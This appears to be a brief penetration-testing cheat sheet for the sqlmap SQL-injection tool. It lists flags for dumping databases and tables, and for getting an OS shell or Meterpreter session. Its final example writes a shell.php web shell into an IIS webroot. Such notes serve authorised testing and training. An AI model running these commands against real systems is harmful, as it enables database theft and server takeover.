# SQLmap

# Usage

# Default
sqlmap -u

# Using a request file (Burp)
sqlmap -r file.req

# Syntax

Argument Description
--dbs Discover database
--dump Dump database
--tables Find tables
--force-ssl If using 443 https
--delay=1 Adds delay in the requests
-D Select database
-T Select table
-C Select Column
--batch Dont prompt - Run as default
--os-shell Interactive shell
--os-pwn OOB shell, meterpreter

# Examples

# When you know the database
sqlmap -r portal.req --dbms=mysql --dump

# Upload a file
sqlmap -r login.req --file-write=/home/kali/shell.php --file-dest=C:/inetpub/wwwroot/shell.php